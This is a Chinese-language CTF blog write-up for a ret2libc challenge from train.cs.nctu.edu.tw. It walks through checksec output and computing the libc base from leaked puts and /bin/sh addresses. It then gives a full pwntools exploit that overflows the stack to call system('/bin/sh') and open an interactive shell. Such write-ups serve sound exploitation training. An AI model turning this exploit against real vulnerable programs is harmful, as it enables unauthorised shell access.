臺灣交通大學train.cs.nctu.edu.tw-ret2libc Writeup

检查文件：

checksec
File:     /home/zhailin/365-Days-Get-ISCAS-Internship/week1/ret2libc/ret2libc3/train.cs.nctu.edu.tw/ret2libc/ret2libc
Arch:     i386
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x8048000)
Stripped:   No

在IDA中反编译

images

查看字符串，其中泄露了/bin/sh和puts的地址：

images

在gdb中验证

images

接下来计算偏移量；

images

之后通过puts_addr - puts_offset得到基地址加上system_offset得到system的地址，后溢出至libc中的system函数触发/bin/sh

Exp

from pwn import *
from LibcSearcher import *

ret2libc = ELF('./ret2libc')

if args.get('REMOTE'):
    sh = remote('host', port)
    libc = ELF('./libc.so.6')
else:
    sh = process('./ret2libc')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')

system_offset = libc.symbols['system']
puts_offset = libc.symbols['puts']

# 接收并处理字节串数据
sh.recvuntil(b'is ')
sh_addr = int(sh.recvuntil(b'\n', drop=True), 16)
print(hex(sh_addr))

sh.recvuntil(b'is ')
puts_addr = int(sh.recvuntil(b'\n', drop=True), 16)
print(hex(puts_addr))

# 计算 system 地址: puts_addr - puts_offset = 基地址，加上system的offset就可以得到system_addr
system_addr = puts_addr - puts_offset + system_offset

# 构造 payload
payload = flat([b'a' * 0x1c, b'bbbb', system_addr, b'bbbb', sh_addr])

#gdb.attach(sh)
sh.sendline(payload)
sh.interactive()

Pwn

#CTF #Pwn

臺灣交通大學train.cs.nctu.edu.tw-ret2libc Writeup

https://zer0ptr.github.io/2025/10/04/train-cs-nctu-edu-tw-ret2libc/

Author

hakmaple

Posted on

October 4, 2025

Licensed under

NewStarCTF公开赛赛道-ret2libc Writeup Previous

CTF-Wiki bamboofox-ret2libc Next